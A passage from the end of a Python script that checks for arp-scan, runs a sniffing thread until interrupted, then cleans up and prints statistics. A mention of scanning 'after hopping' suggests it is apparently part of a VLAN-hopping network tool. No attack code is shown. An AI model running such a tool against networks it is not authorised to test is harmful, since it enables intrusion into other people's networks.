    if shell("which arp-scan") != '':
        arpScanAvailable = True
    else:
        Logger.err('arp-scan not available: will not perform scanning after hopping.')

    t = threading.Thread(target = sniffThread)
    t.daemon = True
    t.start()

    try:
        # Sleep while waiting for Ctrl+C instead of spinning on `pass`,
        # which keeps one CPU core fully busy.
        while True:
            time.sleep(1)
    except KeyboardInterrupt:
        print('\n[>] Cleaning up...')

    stopThreads = True
    time.sleep(3)

    cleanup()

    printStats()

    return True
if __name__ == '__main__':
    # Surface main()'s boolean result as the process exit status
    # (0 on success, 1 on failure).
    sys.exit(0 if main(sys.argv) else 1)